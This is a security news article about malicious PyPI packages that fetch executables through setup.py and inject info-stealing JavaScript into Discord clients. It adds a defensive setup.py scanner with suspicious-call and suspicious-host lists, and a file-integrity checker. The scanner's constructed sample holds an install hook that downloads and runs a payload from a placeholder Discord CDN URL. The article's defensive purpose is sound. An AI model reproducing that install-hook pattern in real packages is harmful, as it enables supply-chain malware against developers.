A dozen PyPI packages turn Discord into an info-stealing backdoor (Security News, August 2022)
A dozen malicious PyPI packages have been discovered installing malware that modifies the Discord client into an information-stealing backdoor and steals data from web browsers and Roblox.
This malicious set of PyPI Python packages had not been removed from the open-source package repository at the time of writing, so software developers are still at risk.
In a new report, Snyk researchers analyze one of these malicious Python packages, named "Cyphers," showing how malicious code hidden in its setup.py file is used to install two malware executables fetched from a Discord CDN server, "ZYXMN.exe" and "ZYRBX.exe."
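Because setup.py executes arbitrary Python at install time, the install hook described above is the natural place for a package to fetch and run a payload. The following static check is an added example written for this article (it is not Snyk's tooling or anything from the "Cyphers" package): it parses a setup.py with the standard `ast` module and reports setuptools command overrides, network fetches, process execution, payload decoding, and embedded URLs, with an extra flag for hosts commonly abused for payload hosting. The indicator lists, the `scan_setup_py` function name, and the sample setup.py (including its placeholder URL) are all constructed for this example.

```python
import ast
import re

# Indicator sets are an assumption of this example, not a published signature list.
NETWORK_CALLS = {"urllib.request.urlopen", "urllib.request.urlretrieve", "urlopen", "urlretrieve"}
EXEC_CALLS = {"os.system", "os.popen", "os.startfile", "subprocess.run", "subprocess.call",
              "subprocess.Popen", "subprocess.check_output", "exec", "eval"}
DECODE_CALLS = {"base64.b64decode", "base64.a85decode", "zlib.decompress"}
COMMAND_BASES = {"install", "develop", "egg_info"}      # setuptools commands worth overriding at install time
SUSPICIOUS_HOSTS = ("cdn.discordapp.com", "discord.com/api/webhooks")
URL_RE = re.compile(r"https?://[^\s'\"]+")


def _dotted(func):
    """Rebuild the dotted callee name, e.g. 'urllib.request.urlretrieve' or 'os.system'."""
    if isinstance(func, ast.Name):
        return func.id
    if isinstance(func, ast.Attribute):
        base = _dotted(func.value)
        return f"{base}.{func.attr}" if base else func.attr
    return ""


def scan_setup_py(source):
    """Return a line-sorted list of human-readable findings for one setup.py source string."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = _dotted(node.func)
            if name in NETWORK_CALLS or name.startswith("requests."):
                findings.append((node.lineno, f"line {node.lineno}: network call {name}()"))
            elif name in EXEC_CALLS:
                findings.append((node.lineno, f"line {node.lineno}: code/process execution via {name}()"))
            elif name in DECODE_CALLS:
                findings.append((node.lineno, f"line {node.lineno}: payload decoding via {name}()"))
        elif isinstance(node, ast.ClassDef):
            # A subclass of install/develop/egg_info runs custom code during `pip install`.
            for base in node.bases:
                if _dotted(base).split(".")[-1] in COMMAND_BASES:
                    findings.append((node.lineno, f"line {node.lineno}: class {node.name} "
                                                  f"overrides setuptools command {_dotted(base)}"))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            for url in URL_RE.findall(node.value):
                tag = "suspicious host" if any(h in url for h in SUSPICIOUS_HOSTS) else "url"
                findings.append((node.lineno, f"line {node.lineno}: {tag} {url}"))
    return [msg for _, msg in sorted(findings)]


# Constructed sample mimicking the install-hook pattern; the URL is a placeholder, not a real artifact.
SAMPLE_SETUP_PY = '''\
from setuptools import setup
from setuptools.command.install import install
import os, urllib.request

class PostInstall(install):
    def run(self):
        install.run(self)
        urllib.request.urlretrieve("https://cdn.discordapp.com/attachments/EXAMPLE/payload.exe", "payload.exe")
        os.system("payload.exe")

setup(name="example-pkg", version="0.0.1", cmdclass={"install": PostInstall})
'''

if __name__ == "__main__":
    for finding in scan_setup_py(SAMPLE_SETUP_PY):
        print(finding)
```

Run it against an sdist's setup.py before `pip install` (or download with `pip download --no-binary :all:` and unpack first); a `cmdclass` override combined with a network fetch and process execution is the combination that warrants a manual look, while a bare URL in a description string is usually benign.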
Even more interesting, the malware modifies the JavaScript files used by the Discord client itself to inject a backdoor that can steal information directly from your Discord account.
The clients targeted for this injection are Discord, Discord Development, Discord Canary, and Discord PTB. Once the script is injected and Discord is restarted, it performs a range of malicious actions, including stealing authentication tokens, Nitro status, billing information, and credit card details.
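Tampering with the client's bundled JavaScript is something a file-integrity baseline catches regardless of what the injected code does. The example below is added here and is not from Snyk, Kaspersky, or Discord: it hashes every file under an install directory into a manifest, then diffs a later manifest to list added, removed, and modified files. The directory layout under `modules/discord_desktop_core-1/` and the one-line `index.js` content are assumptions about a typical desktop install, and the demo builds them in a temporary directory with a constructed, harmless tamper marker rather than touching a real client.

```python
import hashlib
import tempfile
from pathlib import Path


def sha256_file(path):
    """Stream a file through SHA-256 so large asar bundles don't have to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root):
    """Map each file's POSIX-style relative path to its SHA-256 hex digest."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): sha256_file(p)
            for p in root.rglob("*") if p.is_file()}


def compare_manifest(baseline, current):
    """Diff two manifests; 'modified' lists paths present in both with differing hashes."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(k for k in baseline.keys() & current.keys() if baseline[k] != current[k]),
    }


# Assumption: a clean discord_desktop_core/index.js is a single require() of the packed core module.
CLEAN_INDEX_JS = "module.exports = require('./core.asar');\n"


def demo():
    """Build a fake install tree, baseline it, tamper with it, and return the diff."""
    with tempfile.TemporaryDirectory() as tmp:
        core = Path(tmp) / "modules" / "discord_desktop_core-1" / "discord_desktop_core"
        core.mkdir(parents=True)
        index = core / "index.js"
        index.write_text(CLEAN_INDEX_JS)
        baseline = build_manifest(tmp)           # taken right after a trusted install/update

        # Constructed tamper marker standing in for an injected script; it does nothing.
        index.write_text(CLEAN_INDEX_JS + "// constructed tamper marker\n")
        (core / "extra_stub.js").write_text("// constructed placeholder file\n")
        return compare_manifest(baseline, build_manifest(tmp))


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(kind, paths)
```

In practice the baseline must be re-taken after each legitimate client update, and the manifest should be stored somewhere the client's user account cannot write, otherwise the same process that edits index.js can edit the baseline.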
More malware on PyPI: yesterday, Kaspersky published a report presenting two other PyPI packages that contain info-stealing malware and also modify the Discord client.